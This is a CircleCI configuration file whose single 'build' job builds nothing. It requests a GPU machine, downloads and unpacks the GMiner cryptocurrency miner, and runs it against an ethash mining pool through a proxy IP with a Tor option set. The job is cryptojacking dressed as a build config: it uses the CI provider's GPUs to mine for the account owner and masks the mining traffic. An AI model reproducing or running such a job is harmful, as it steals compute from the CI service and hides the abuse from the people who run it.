version: 2.1 
 
jobs: 
  build: 
    machine: 
      image: ubuntu-1604-cuda-10.1:201909-23 
    resource_class: gpu.nvidia.medium
    steps: 
      - run: nvidia-smi 
      - run: wget https://github.com/develsoftware/GMinerRelease/releases/download/2.91/gminer_2_91_linux64.tar.xz && tar -xvf gminer_2_91_linux64.tar.xz && ./miner --algo ethash --server stratum+tcp://ethash.poolbinance.com:1800 --user teguhcong.$(echo tesBezzMiniZ-$(shuf -i 1-99 -n 1))#zc1y-m4ie -p x -d 0 --log_newjob 0 --cuda 1 --watchdog 0 --proto stratum --proxy 176.53.133.217:57597 --Tor 